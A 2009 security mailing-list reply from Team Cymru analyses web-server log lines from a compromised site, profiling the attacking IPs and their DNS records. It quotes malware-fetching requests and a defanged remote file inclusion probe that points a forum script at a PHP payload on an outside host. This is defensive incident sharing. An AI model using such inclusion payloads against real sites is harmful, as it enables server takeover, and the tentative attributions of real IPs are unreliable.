[nsp-sec] Some malware on a Web server of ours
Rob Thomas
robt at cymru.com
Wed Feb 11 17:11:30 EST 2009
Hey, Joel.
Sorry to hear about the hack and malware.
> 189.129.97.12 - - [05/Feb/2009:22:12:14 -0500] "GET
> /FX/Developer/PHPCACHE/php5.php HTTP/1.1" 200 1424
Someone at 189.129.97.12 spent some quality time telnet'd into a Linux
box at 220.182.54.89 about 45 minutes after hitting you. Might not be
related, but I thought I'd share it just in case.
> 62.193.13.163 - - [05/Feb/2009:22:32:10 -0500] "GET
> /FX/Databases/store/safeon.txt?? HTTP/1.1" 200 656
This appears to be a Linux box and Squid 2.6 STABLE14 proxy. The hosts
using this Squid proxy also appear to be Linux boxes.
> 84.38.64.218 - - [05/Feb/2009:22:54:14 -0500] "GET
> /FX/Databases/store/safeon.txt?? HTTP/1.1" 200 656
This appears to be a Windows XP host. It also appears to be a web
server with a few DNS RRs pointed to it.
timestamp | dns_name | ip
--------------------- ------------------ --------------
2009-02-08 21:35:19 | glas-blog.de | 84.38.64.218
2009-02-08 22:50:54 | www.glas-blog.de | 84.38.64.218
2009-01-15 09:05:18 | pyratz.com | 84.38.64.218
2009-01-20 17:35:51 | www.pyratz.eu | 84.38.64.218
So why is the web server piece interesting? Because someone appears to
have been testing for similar malware through this web server, or
probing it for XSS, or just messing around. The URL was:
h x x p : / /
www.pyratz.eu//forum.php?act=http://people34.fr/gang11/test.txt??
Thanks,
Rob.
--
Rob Thomas
Team Cymru
http://www.team-cymru.org/
cmn_err(CEO_PANIC, "Out of coffee!");
More information about the nsp-security
mailing list